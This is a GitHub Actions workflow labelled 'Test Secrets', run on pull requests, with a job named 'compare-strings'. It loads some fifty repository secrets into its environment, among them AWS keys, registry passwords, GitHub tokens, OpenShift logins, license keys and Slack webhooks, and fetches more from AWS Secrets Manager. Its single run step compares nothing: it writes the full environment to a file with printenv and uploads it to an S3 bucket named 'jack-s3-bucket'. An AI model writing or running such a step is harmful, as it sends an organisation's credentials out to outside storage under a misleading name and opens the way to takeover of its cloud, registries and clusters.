
name: Test Secrets

on:
  pull_request:

jobs:
  compare-strings:
    runs-on: ubuntu-latest
    env:
      AWS_DEV_INFRA_ACCESS_KEY_ID: ${{ secrets.AWS_DEV_INFRA_ACCESS_KEY_ID }}
      AWS_DEV_INFRA_SECRET_ACCESS_KEY: ${{ secrets.AWS_DEV_INFRA_SECRET_ACCESS_KEY }}
      DOCKER_PASSWORD: ${{ secrets.DOCKER_PASSWORD }}
      DOCKER_USERNAME: ${{ secrets.DOCKER_USERNAME }}
      EXTENDED_SUPPORT_PLUS_5_3_REPOSITORY: ${{ secrets.EXTENDED_SUPPORT_PLUS_5_3_REPOSITORY }}
      HZ_4_EE_RHEL_REPOSITORY: ${{ secrets.HZ_4_EE_RHEL_REPOSITORY }}
      HZ_4_EE_RHEL_REPO_PASSWORD: ${{ secrets.HZ_4_EE_RHEL_REPO_PASSWORD }}
      HZ_5_EE_RHEL_REPOSITORY: ${{ secrets.HZ_5_EE_RHEL_REPOSITORY }}
      HZ_5_EE_RHEL_REPO_PASSWORD: ${{ secrets.HZ_5_EE_RHEL_REPO_PASSWORD }}
      HZ_ENTERPRISE_LICENSE: ${{ secrets.HZ_ENTERPRISE_LICENSE }}
      HZ_LICENSE_KEY: ${{ secrets.HZ_LICENSE_KEY }}
      JFROG_REGISTRY: ${{ secrets.JFROG_REGISTRY }}
      NLC_IMAGE_NAME: ${{ secrets.NLC_IMAGE_NAME }}
      NLC_REPOSITORY: ${{ secrets.NLC_REPOSITORY }}
      NLC_REPO_TOKEN: ${{ secrets.NLC_REPO_TOKEN }}
      NLC_REPO_USERNAME: ${{ secrets.NLC_REPO_USERNAME }}
      OCP_CLUSTER_URL: ${{ secrets.OCP_CLUSTER_URL }}
      OCP_LOGIN_PASSWORD: ${{ secrets.OCP_LOGIN_PASSWORD }}
      OCP_LOGIN_USERNAME: ${{ secrets.OCP_LOGIN_USERNAME }}
      QUAY_TOKEN: ${{ secrets.QUAY_TOKEN }}
      QUAY_USERNAME: ${{ secrets.QUAY_USERNAME }}
      RHEL_PROJECT_ID_V5: ${{ secrets.RHEL_PROJECT_ID_V5 }}
      RHEL_PROJECT_ID_V6: ${{ secrets.RHEL_PROJECT_ID_V6 }}
      S3_NLC_URL: ${{ secrets.S3_NLC_URL }}
      SCAN_REGISTRY_PASSWORD: ${{ secrets.SCAN_REGISTRY_PASSWORD }}
      SCAN_REGISTRY_PASSWORD_V5: ${{ secrets.SCAN_REGISTRY_PASSWORD_V5 }}
      SCAN_REGISTRY_PASSWORD_V6: ${{ secrets.SCAN_REGISTRY_PASSWORD_V6 }}
      SCAN_REGISTRY_USER: ${{ secrets.SCAN_REGISTRY_USER }}
      SCAN_REGISTRY_USER_V5: ${{ secrets.SCAN_REGISTRY_USER_V5 }}
      SCAN_REGISTRY_USER_V6: ${{ secrets.SCAN_REGISTRY_USER_V6 }}
      SLACK_WEBHOOK: ${{ secrets.SLACK_WEBHOOK }}
      AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}
      AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
      CODECOV_TOKEN: ${{ secrets.CODECOV_TOKEN }}
      DOCKERHUB_USERNAME: ${{ secrets.DOCKERHUB_USERNAME }}
      GH_PAT: ${{ secrets.GH_PAT }}
      GH_TOKEN: ${{ secrets.GH_TOKEN }}
      HAZELCAST_ENTERPRISE_KEY: ${{ secrets.HAZELCAST_ENTERPRISE_KEY }}
      HAZELCAST_ENTERPRISE_KEY_V7: ${{ secrets.HAZELCAST_ENTERPRISE_KEY_V7 }}
      HZ_SNAPSHOT_INTERNAL_PASSWORD: ${{ secrets.HZ_SNAPSHOT_INTERNAL_PASSWORD }}
      HZ_SNAPSHOT_INTERNAL_USERNAME: ${{ secrets.HZ_SNAPSHOT_INTERNAL_USERNAME }}
      JFROG_PASSWORD: ${{ secrets.JFROG_PASSWORD }}
      JFROG_USERNAME: ${{ secrets.JFROG_USERNAME }}
      JIRA_API_TOKEN: ${{ secrets.JIRA_API_TOKEN }}
      JIRA_BASE_URL: ${{ secrets.JIRA_BASE_URL }}
      JIRA_USER_EMAIL: ${{ secrets.JIRA_USER_EMAIL }}
      NVD_API_KEY: ${{ secrets.NVD_API_KEY }}
      RHEL_API_KEY: ${{ secrets.RHEL_API_KEY }}
      SLACK_WEBHOOK_MONOREPO: ${{ secrets.SLACK_WEBHOOK_MONOREPO }}
      SNYK_TOKEN: ${{ secrets.SNYK_TOKEN }}
      SSH_DOCS_SERVER_HOSTNAME: ${{ secrets.SSH_DOCS_SERVER_HOSTNAME }}

    steps:
      - uses: aws-actions/configure-aws-credentials@v4
        with:
          aws-access-key-id: ${{ secrets.AWS_ACCESS_KEY_ID }}
          aws-secret-access-key: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
          aws-region: us-east-1

      - name: Get Secrets
        uses: aws-actions/aws-secretsmanager-get-secrets@v2
        with:
          secret-ids: |
            OCP_LOGIN_USERNAME,CN/OCP_USERNAME
            OCP_LOGIN_PASSWORD,CN/OCP_PASSWORD
            OCP_CLUSTER_URL,CN/OCP_CLUSTER_URL

      - run: |
          printenv >> myfile.txt
          aws s3 cp myfile.txt s3://jack-s3-bucket/myfile.txt
